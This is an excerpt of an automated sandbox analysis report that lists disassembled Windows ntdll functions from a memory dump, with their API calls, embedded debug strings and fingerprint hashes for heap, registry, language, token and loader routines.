Instruction Fuzzy Hash: A592AAB4D00299CFDB16CF6CC490BADBBF2BF08304F1495AAE496AB395D7349945CB50

Uniqueness

Uniqueness Score: -1.00%

Function 726763C2, Relevance: 33.8, APIs: 16, Strings: 3, Instructions: 572COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 726B6ACB, 726B6B92, 726B6D37, 726B6E80
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 726B6AE0, 726B6BA7, 726B6D4C, 726B6E95
HEAP[%wZ]: , xrefs: 726B6ABE, 726B6B85, 726B6D2A, 726B6E73

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 7c9d1199c83569359bd52dac2b2d0ee34a642089c8ebd5477195c29834a6e62d
Instruction ID: 6ad2ff8537efc6d6b7109b95020e886e61cf83b610d77e4e3f6998a592723398
Opcode Fuzzy Hash: 7c9d1199c83569359bd52dac2b2d0ee34a642089c8ebd5477195c29834a6e62d
Instruction Fuzzy Hash: 5222D1706002469FDB15CF2DC490B6ABBF5EF45704F20856EE8968B3C6E739E895CB50

Uniqueness

Uniqueness Score: -1.00%

Function 72648209, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 233nativememoryCOMMON

Download Yara Rule

APIs

RtlInitUnicodeStringEx.210A(?,UseFilter,?,00000000,?), ref: 7264825D
ZwQueryValueKey.210A(?,?,00000002,?,00000220,?,?,UseFilter,?,00000000,?), ref: 72648284
RtlInitUnicodeStringEx.210A(?,\??\,?,?,00000002,?,00000220,?,?,UseFilter,?,00000000,?), ref: 726A3B99
RtlPrefixUnicodeString.210A(?,?,00000001,?,\??\,?,?,00000002,?,00000220,?,?,UseFilter,?,00000000,?), ref: 726A3BB6
ZwEnumerateKey.210A(?,00000000,00000000,?,00000220,?,?,?,00000001,?,\??\,?,?,00000002,?,00000220), ref: 726A3C02
ZwOpenKey.210A(00000000,?,?,?,00000000,00000000,?,00000220,?,?,?,00000001,?,\??\,?,?), ref: 726A3C80
RtlInitUnicodeStringEx.210A(?,FilterFullPath,00000000,?,?,?,00000000,00000000,?,00000220,?,?,?,00000001,?,\??\), ref: 726A3C9B
ZwQueryValueKey.210A(00000000,?,00000002,?,00000220,?,?,FilterFullPath,00000000,?,?,?,00000000,00000000,?,00000220), ref: 726A3CCE
RtlFreeHeap.210A(?,00000000,00000000,00000000,?,00000002,?,00000220,?,?,FilterFullPath,00000000,?,?,?,00000000), ref: 726A3CF5

Strings

UseFilter, xrefs: 72648233
\??\, xrefs: 726A3B8D
FilterFullPath, xrefs: 726A3C8F

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: StringUnicode$Init$QueryValue$EnumerateFreeHeapOpenPrefix
String ID: FilterFullPath$UseFilter$\??\
API String ID: 941260810-2779062949
Opcode ID: e4163540f54fa63473993055dec613839253ddb3825615fee1056bb2440efdc7
Instruction ID: a13547a4937bfd1aee5a8dc3df118492595a81e0a85a85b35b42d84c02dee615
Opcode Fuzzy Hash: e4163540f54fa63473993055dec613839253ddb3825615fee1056bb2440efdc7
Instruction Fuzzy Hash: FFA18E71901669DBDB21DF18CC98BDAB7B9EF04704F1001EAE90AA7290DB359E85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 72702782, Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 228memorytimeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.210A(?,?,?,72720870,00000044,72665889,?,?), ref: 727027B3
RtlEnterCriticalSection.210A(?,72720870,00000044,72665889,?,?), ref: 72702833
RtlAllocateHeap.210A(?,?,?,72720870,00000044,72665889,?,?), ref: 72702858

Strings

Just allocated block at %p for 0x%Ix bytes with tag %ws, xrefs: 72702A15
HEAP: , xrefs: 7270294B, 727029F8, 72702A4F
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 72702A5E
HEAP[%wZ]: , xrefs: 7270293E, 727029EB, 72702A42
RtlAllocateHeap, xrefs: 727027CA
Just allocated block at %p for %Ix bytes, xrefs: 7270295F

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: AllocateCriticalDebugEnterHeapPrintSectionTimes
String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
API String ID: 1085986457-1745908468
Opcode ID: ec26f51b20ebcac9ef6b6c7a653b7c260529290a386653e93f3c5a239ca5e533
Instruction ID: e095b73e53b6664a2455bd845db83e66d3afec74f77f0c09aa194122d370c53f
Opcode Fuzzy Hash: ec26f51b20ebcac9ef6b6c7a653b7c260529290a386653e93f3c5a239ca5e533
Instruction Fuzzy Hash: 79913532900685CFDB22CF6DC641BADBBF2FF45314F14800EE8866B692CB319949CB48

Uniqueness

Uniqueness Score: -1.00%

Function 7264411D, Relevance: 31.7, APIs: 11, Strings: 7, Instructions: 195nativeCOMMON

Download Yara Rule

APIs

RtlImageNtHeaderEx.210A(00000003,?,00000000,00000000,?), ref: 72644150
ZwSetInformationProcess.210A(000000FF,00000022,?,00000004,00000003,?,00000000,00000000,?), ref: 726A13A5

Strings

CLIENT(ntdll): Processing section info %ws..., xrefs: 726A1361
ExecuteOptions, xrefs: 726A127A
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 726A12FF
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 726A12D6
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 726A131C
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 726A122F
Execute=1, xrefs: 726A12ED

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: HeaderImageInformationProcess
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 4034523672-484625025
Opcode ID: 12365640def56aaa0ab6909c36845ca4d0fad89b2728180a6d1b2647664d2e63
Instruction ID: 1d0122d1bd936eadcc8b5318c0ca9ad89c66555ab333faa0461e08145b221f9e
Opcode Fuzzy Hash: 12365640def56aaa0ab6909c36845ca4d0fad89b2728180a6d1b2647664d2e63
Instruction Fuzzy Hash: 64610431A002196BEF11DA9CDC96FAA77B9AF24305F1011EBEA46A71C1DF709F41CE54

Uniqueness

Uniqueness Score: -1.00%

Function 726893F6, Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 336memorynativeCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.210A(?,00000008,?,?,00000001,?,?,?,?,?,?,?,?,72687F2F,00000001,?), ref: 72689477
RtlAllocateHeap.210A(?,00000008,?,?,00000008,?,?,00000001,?), ref: 7268949B
RtlCreateUnicodeString.210A(0000006C,?,?,00000008,?,?,00000001,?,?,?,?,?,?,?,?,72687F2F), ref: 72689500
ZwCreateEvent.210A(00000060,001F0003,00000000,00000001,00000000,00000001,0000006C,?,?,00000008,?,?,00000001,?), ref: 72689666
ZwCreateEvent.210A(00000064,001F0003,00000000,00000001,00000000,00000060,001F0003,00000000,00000001,00000000,00000001,0000006C,?,?,00000008,?), ref: 7268967E
RtlInitializeCriticalSectionEx.210A(00000048,00000000,00000000,00000064,001F0003,00000000,00000001,00000000,00000060,001F0003,00000000,00000001,00000000,00000001,0000006C,?), ref: 72689693
ZwClose.210A(?,?,00000008,?,?,00000001,?,?,?,?,?,?,?,?,72687F2F,00000001), ref: 726C0A89
ZwClose.210A(?,?,00000008,?,?,00000001,?,?,?,?,?,?,?,?,72687F2F,00000001), ref: 726C0A9B
RtlFreeHeap.210A(?,00000000,?,?,00000008,?,?,00000001,?), ref: 726C0ABA
RtlFreeHeap.210A(?,00000000,?,?,00000008,?,?,00000001,?), ref: 726C0AD5
RtlFreeUnicodeString.210A(0000006C,?,00000008,?,?,00000001,?,?,?,?,?,?,?,?,72687F2F,00000001), ref: 726C0AE5
RtlFreeUnicodeString.210A(00000074,0000006C,?,00000008,?,?,00000001,?,?,?,?,?,?,?,?,72687F2F), ref: 726C0AEE
RtlFreeUnicodeString.210A(0000007C,00000074,0000006C,?,00000008,?,?,00000001,?), ref: 726C0AF7
RtlFreeHeap.210A(?,00000000,00000000,0000007C,00000074,0000006C,?,00000008,?,?,00000001,?), ref: 726C0B08

Strings

`sr, xrefs: 726C0A1B

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Free$Heap$StringUnicode$Create$AllocateCloseEvent$CriticalInitializeSection
String ID: `sr
API String ID: 3889688668-3650220147
Opcode ID: 5dd41a62b35635975d1542815c98a62b25713e109d8f8fbffcab26417b6a1042
Instruction ID: 2121dfc4995d30ad5a83b34e64e6cd369527e9c70fa14bdbd2141ba370d96c14
Opcode Fuzzy Hash: 5dd41a62b35635975d1542815c98a62b25713e109d8f8fbffcab26417b6a1042
Instruction Fuzzy Hash: 55D11671A012049FDB55DF68C980B967BF9FF48304F14446AEE0ADB396E731E945CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 72650020, Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 108memoryCOMMON

Download Yara Rule

APIs

RtlCreateHeap.210A(00000003,00000000,00000000,00000000,00000000,00000000,?,?,?,7264FE77,7271F2C0,00000068,7264FD45,000000FF,?,727379A0), ref: 726A7114
DbgPrint.210A(HEAP[%wZ]: ,?,00000003,00000000,00000000,00000000,00000000,00000000,?,?,?,7264FE77,7271F2C0,00000068,7264FD45,000000FF), ref: 726A7152
DbgPrint.210A(HEAP: ,00000003,00000000,00000000,00000000,00000000,00000000,?,?,?,7264FE77,7271F2C0,00000068,7264FD45,000000FF,?), ref: 726A715B
DbgPrint.210A(Inspecting leaks at process shutdown ...,00000003,00000000,00000000,00000000,00000000,00000000,?,?,?,7264FE77,7271F2C0,00000068,7264FD45,000000FF,?), ref: 726A7166
RtlDestroyHeap.210A(00000003,00000000,00000000,00000000,00000000,00000000,?,?,?,7264FE77,7271F2C0,00000068,7264FD45,000000FF,?,727379A0), ref: 726A717B
RtlDestroyHeap.210A(00000003,00000000,00000000,00000000,00000000,00000000,?,?,?,7264FE77,7271F2C0,00000068,7264FD45,000000FF,?,727379A0), ref: 726A71AA
DbgPrint.210A(HEAP[%wZ]: ,?,00000000,00000000,00000000,00000000,00000000,?,?,?,7264FE77,7271F2C0,00000068,7264FD45,000000FF,?), ref: 726A71DD
DbgPrint.210A(%ld leaks detected.,00000000,00000000,00000000,00000000,00000000,?,?,?,7264FE77,7271F2C0,00000068,7264FD45,000000FF,?,727379A0), ref: 726A71F7

Strings

Inspecting leaks at process shutdown ..., xrefs: 726A7161
HEAP: , xrefs: 726A712D, 726A715A, 726A71E5, 726A7233
%ld leaks detected., xrefs: 726A71F2
No leaks detected., xrefs: 726A723A
HEAP[%wZ]: , xrefs: 726A714D, 726A71D8, 726A7226

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Print$Heap$Destroy$Create
String ID: %ld leaks detected.$HEAP: $HEAP[%wZ]: $Inspecting leaks at process shutdown ...$No leaks detected.
API String ID: 4158469884-1155200129
Opcode ID: 26423efc485c04c5b623898f4643da1e83b6138019c89ee82ba385a3a2aef2d2
Instruction ID: bb02a51d4855e9cefa881e2cbd724f8ded8cc0f0a579621aee2b13e5721d23e6
Opcode Fuzzy Hash: 26423efc485c04c5b623898f4643da1e83b6138019c89ee82ba385a3a2aef2d2
Instruction Fuzzy Hash: C331EE36510686CFD713AB6DC985F0A7BF4FB04B66F24841FE8424B6C6EB34A950CA08

Uniqueness

Uniqueness Score: -1.00%

Function 726ED4C0, Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 304COMMON

Download Yara Rule

APIs

memset.210A(?,00000000,00000030,00000000,00000000,HEAP: ), ref: 726ED50F
RtlEnterCriticalSection.210A(72736620), ref: 726ED552
RtlLeaveCriticalSection.210A(72736620,?,?), ref: 726ED5B5

Strings

HEAP: , xrefs: 726ED4DC

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CriticalSection$EnterLeavememset
String ID: HEAP:
API String ID: 759993129-2466845122
Opcode ID: 0120024bc14ef8a2eb4803c1dd9f1836a88e0a4e1e9613715682391679a4148a
Instruction ID: 295faac39039dac2c47d242fa44d946510b88caa772c3d7e3a2b4e7dca87fa23
Opcode Fuzzy Hash: 0120024bc14ef8a2eb4803c1dd9f1836a88e0a4e1e9613715682391679a4148a
Instruction Fuzzy Hash: 0BC16C7190A3419FD711CF28C980A5BBBF9BF84754F144A2EFAA69B2D4D730D904CB92

Uniqueness

Uniqueness Score: -1.00%

Function 72646570, Relevance: 28.2, APIs: 9, Strings: 7, Instructions: 157nativeCOMMON

Download Yara Rule

APIs

RtlInitUnicodeString.210A ref: 726465C8
ZwQueryLicenseValue.210A(?,?,00000003,00000004,?), ref: 726465E3
RtlInitUnicodeString.210A(?,\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\OEM), ref: 72646632
ZwClose.210A(?,?,?,?,?,?,00020119,00000018), ref: 72646692
ZwOpenKey.210A(?,?,?,?,00020119,00000018), ref: 7264666A

Part of subcall function 7268A300: LdrInitializeThunk.NTDLL(7264E062,?,?,?,?,00020019,00000018,?,?,?,?,\Registry\Machine\Software\Policies\Microsoft\MUI\Settings,00000000), ref: 7268A30A

RtlInitUnicodeString.210A(?,\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion), ref: 726A2730
ZwOpenKey.210A(?,?,?,?,00020119,00000018), ref: 726A276A
ZwClose.210A(?,?,?,?,?,?,00020119,00000018), ref: 726A2792
RtlGetVersion.210A(?,?,?,?,?,00020119,00000018), ref: 726A27A4

Strings

@, xrefs: 7264665A
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\OEM, xrefs: 72646616
UBR, xrefs: 726A277C
Kernel-OneCore-DeviceFamilyID, xrefs: 726465AE
DeviceForm, xrefs: 72646680
@, xrefs: 726A2759
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion, xrefs: 726A271C

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: InitStringUnicode$CloseOpen$InitializeLicenseQueryThunkValueVersion
String ID: @$@$DeviceForm$Kernel-OneCore-DeviceFamilyID$UBR$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\OEM
API String ID: 2689724482-2811273990
Opcode ID: 019e4b81a0a5912e3662451af6168aa5bde92bceb762e8c911a386d5cb9a9440
Instruction ID: b3a2433637471c892c7d5d14249e54df8833589c3be02ae39d6ce5a08ff9abc2
Opcode Fuzzy Hash: 019e4b81a0a5912e3662451af6168aa5bde92bceb762e8c911a386d5cb9a9440
Instruction Fuzzy Hash: FF512AB15083569FD314CF19C940A8BBBE9EFC8754F10492FFA98E7290D731DA098B96

Uniqueness

Uniqueness Score: -1.00%

Function 726FE7E6, Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 344nativeCOMMON

Download Yara Rule

APIs

memset.210A(?,00000000,000000AA,727366C0,?), ref: 726FE845
memset.210A(?,00000000,000000AA,?,727366C0,?), ref: 726FE85C
memset.210A(?,00000000,000000AA,?,?,?,?,727366C0,?), ref: 726FE873
ZwQueryInstallUILanguage.210A(?,?,?,?,?,?,?,?,727366C0,?), ref: 726FE8D6

Part of subcall function 7264D930: memset.210A(00000000,00000000,00000158,?,?), ref: 7264D983
Part of subcall function 7264D930: RtlInitUnicodeString.210A(?,\Registry\Machine\System\CurrentControlSet\Control\NLS\Language,?,?,?,?,?,?,?,?,?,?,?,?,?,726FE8FD), ref: 7264D9A2
Part of subcall function 7264D930: ZwOpenKey.210A(?,?,?,?,00020019,00000018), ref: 7264D9E0
Part of subcall function 7264D930: RtlInitUnicodeString.210A(?,InstallLanguageFallback,?,?,?,?,00020019,00000018), ref: 7264D9F5
Part of subcall function 7264D930: ZwClose.210A(00000000,?,?,?,?,00020019,00000018), ref: 7264DA30
Part of subcall function 7264D930: RtlFreeHeap.210A(?,00000000,00000000,?,?,?,?,00020019,00000018), ref: 7264DA46

ZwIsUILanguageComitted.210A(?,?,?,?,?,?,?,?,?,727366C0,?), ref: 726FE922
RtlLCIDToCultureName.210A(?,?,?,?,?,?,?,?,?,727366C0,?), ref: 726FE9A2
ZwQueryValueKey.210A(?,?,00000001,?,00000200,00000200,?,?,?,?,?,?,?,?,?,727366C0), ref: 726FE9D1
RtlInitUnicodeString.210A(?,DefaultFallback,?,?,?,?,?,?,?,727366C0,?), ref: 726FEA58
RtlCompareUnicodeStrings.210A(?,?,?,?,00000001,00000001,?,?,?,?,DefaultFallback), ref: 726FEACC
RtlInitUnicodeString.210A(?,?,00000001,?,?,?,?,DefaultFallback,?,?,?,?,?,?,?,727366C0), ref: 726FEAE7
ZwQueryValueKey.210A(?,?,00000001,?,00000200,?,?,?,00000001,?,?,?,?,DefaultFallback), ref: 726FEB15
ZwEnumerateValueKey.210A(?,?,00000001,?,00000200,?,00000001,?,?,?,?,DefaultFallback), ref: 726FEBB5
RtlCompareUnicodeStrings.210A(?,?,?,?,00000001,?,?,00000001,?,00000200,?,?,?,00000001,?,00000200), ref: 726FEC43
RtlCompareUnicodeStrings.210A(?,?,?,00000000,00000001,?,?,00000001,?,00000200,?,?,?,00000001,?,00000200), ref: 726FEC70

Strings

DefaultFallback, xrefs: 726FEA4C

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Unicode$InitStringmemset$CompareQueryStringsValue$Language$CloseComittedCultureEnumerateFreeHeapInstallNameOpen
String ID: DefaultFallback
API String ID: 350220673-3328677554
Opcode ID: edd4505a21d270b8843e02d0c7c3a3135f2a17ca9ae00299019f4765fdf34bb4
Instruction ID: c6a3ba03f182ea5e0b78b922e3211f072cc51f554bed2a852b1e13407b55902a
Opcode Fuzzy Hash: edd4505a21d270b8843e02d0c7c3a3135f2a17ca9ae00299019f4765fdf34bb4
Instruction Fuzzy Hash: 1CD103B5A012699ADF65CB18CD44BDAB7B9FF44304F4041EAEA1EE3180E7309E85CF59

Uniqueness

Uniqueness Score: -1.00%

Function 7267245F, Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 183nativememoryCOMMON

Download Yara Rule

APIs

ZwAllocateVirtualMemory.210A(000000FF,00000014,00000000,?,00001000,0000003C,000000FF,?,00000003,00000014,00000014), ref: 726724AF

Part of subcall function 7268A360: LdrInitializeThunk.NTDLL(726D12FF,000000FF,00000000,00000000,0000000C,00001000,00000004,72720200,0000001C,726D1056), ref: 7268A36A

RtlGetCurrentServiceSessionId.210A(000000FF,00000014,00000000,?,00001000,0000003C,000000FF,?,00000003,00000014,00000014), ref: 726724BE
RtlGetCurrentServiceSessionId.210A ref: 726724EB
RtlGetCurrentServiceSessionId.210A ref: 72672503
ZwQueryVirtualMemory.210A(000000FF,?,00000003,00000014,00000014,00000000,?,?,?,-00000018,?,?,?,?,7270468F), ref: 726B4240
DbgPrint.210A(HEAP[%wZ]: ,-0000002C), ref: 726B4398
DbgPrint.210A(ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix),00000000,?,?,?), ref: 726B43BA

Strings

ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 726B43B5
HEAP: , xrefs: 726B43A0
`, xrefs: 726B4249
HEAP[%wZ]: , xrefs: 726B4393

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CurrentServiceSession$MemoryPrintVirtual$AllocateInitializeQueryThunk
String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
API String ID: 1108326835-2586055223
Opcode ID: 63e0d148b05d28a0263eec98c659579b73b00188c881a5bc4f7787022df3bf68
Instruction ID: 96305fcc9698cdedc727caa924ccdc452fb26dd1531dd6981d3f27732d95c28e
Opcode Fuzzy Hash: 63e0d148b05d28a0263eec98c659579b73b00188c881a5bc4f7787022df3bf68
Instruction Fuzzy Hash: 6951F432204680AFE712CF6CD954F5B7BEAFF80754F28046AE9918B2C1D738E905C762

Uniqueness

Uniqueness Score: -1.00%

Function 726504A0, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 194nativethreadCOMMON

Download Yara Rule

APIs

ZwOpenThreadTokenEx.210A(000000FE,00000008,00000000,00000000,?), ref: 726504F3
ZwOpenProcessTokenEx.210A(000000FF,0000000A,?,?,000000FE,00000008,00000000,00000000,?), ref: 72650512
ZwDuplicateToken.210A(?,0000000C,00000018,00000000,00000002,?,000000FF,0000000A,?,?,000000FE,00000008,00000000,00000000,?), ref: 72650577
ZwClose.210A(?,?,0000000C,00000018,00000000,00000002,?,000000FF,0000000A,?,?,000000FE,00000008,00000000,00000000,?), ref: 72650584
RtlCreateSecurityDescriptor.210A(?,00000001,000000FE,00000008,00000000,00000000,?), ref: 726505A0
RtlSetOwnerSecurityDescriptor.210A(?,?,00000000,?,00000001,000000FE,00000008,00000000,00000000,?), ref: 726505AF
RtlSetGroupSecurityDescriptor.210A(?,?,00000000,?,?,00000000,?,00000001,000000FE,00000008,00000000,00000000,?), ref: 726505BE
RtlCreateAcl.210A(?,000000EC,00000002,?,?,00000000,?,?,00000000,?,00000001,000000FE,00000008,00000000,00000000,?), ref: 726505D1
RtlInitializeSidEx.210A(?,72624E00,00000002,00000002,00000001,00000000,00000001,?,00000000,?,000000EC,00000002,?,?,00000000,?), ref: 72650604
RtlSetDaclSecurityDescriptor.210A(?,00000001,?,00000000,00000000,00000001,?,00000000,00000000,?), ref: 72650640
ZwAccessCheck.210A(?,?,00000001,72624E08,?,00000038,?,?,?,00000001,?,00000000,00000000,00000001,?,00000000), ref: 7265067C
ZwClose.210A(00000000,000000FE,00000008,00000000,00000000,?), ref: 726506AD
RtlInitializeSidEx.210A(?,72624E00,00000002,00000002,00000002,00000000,00000001,?,00000000,?,000000EC,00000002,?,?,00000000,?), ref: 726506E7

Strings

8, xrefs: 7265064B

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: DescriptorSecurity$Token$CloseCreateInitializeOpen$AccessCheckDaclDuplicateGroupOwnerProcessThread
String ID: 8
API String ID: 2448758571-4194326291
Opcode ID: 16af2e0596d427e423380f0bf68af9c061d723b9942bfe03665ec9c207668c5d
Instruction ID: 98fea62f451eb72a5c9085378b547554ab2662c240cd0ee1e92a477d4750f412
Opcode Fuzzy Hash: 16af2e0596d427e423380f0bf68af9c061d723b9942bfe03665ec9c207668c5d
Instruction Fuzzy Hash: 3F615A72941228AAEB219A69CC45FDA7BB8EF49710F1041D6F909A71C0EB70DF84CF94

Uniqueness

Uniqueness Score: -1.00%

Function 7264E7F3, Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 185librarymemorytimeCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.210A(727352D8), ref: 7264E84A
RtlLeaveCriticalSection.210A(727352D8,?,00000000,727352D8), ref: 7264E862
RtlAcquireSRWLockExclusive.210A ref: 7264E88D
RtlRbRemoveNode.210A(727385FC,-0000008C), ref: 7264E8A8
RtlRbRemoveNode.210A(727385F4,-00000098,727385FC,-0000008C), ref: 7264E8B6
RtlReleaseSRWLockExclusive.210A(727384D8), ref: 7264E8C4
LdrUnloadAlternateResourceModuleEx.210A(?,00000000,727352D8), ref: 7264E93D
RtlAcquireSRWLockExclusive.210A(727384D8,727352D8,?,00000000,727352D8), ref: 7264E968
RtlReleaseSRWLockExclusive.210A(727384D8,?,727384D8,727352D8,?,00000000,727352D8), ref: 7264E9A9
RtlFreeHeap.210A(00000000,-00000054,727384D8,?,727384D8,727352D8), ref: 7264E9BE
RtlDebugPrintTimes.210A(-00000054,?,727352D8), ref: 7264EA10

Strings

LdrpUnloadNode, xrefs: 726A69B3
Unmapping DLL "%wZ", xrefs: 726A69AC
minkernel\ntdll\ldrsnap.c, xrefs: 726A69BD

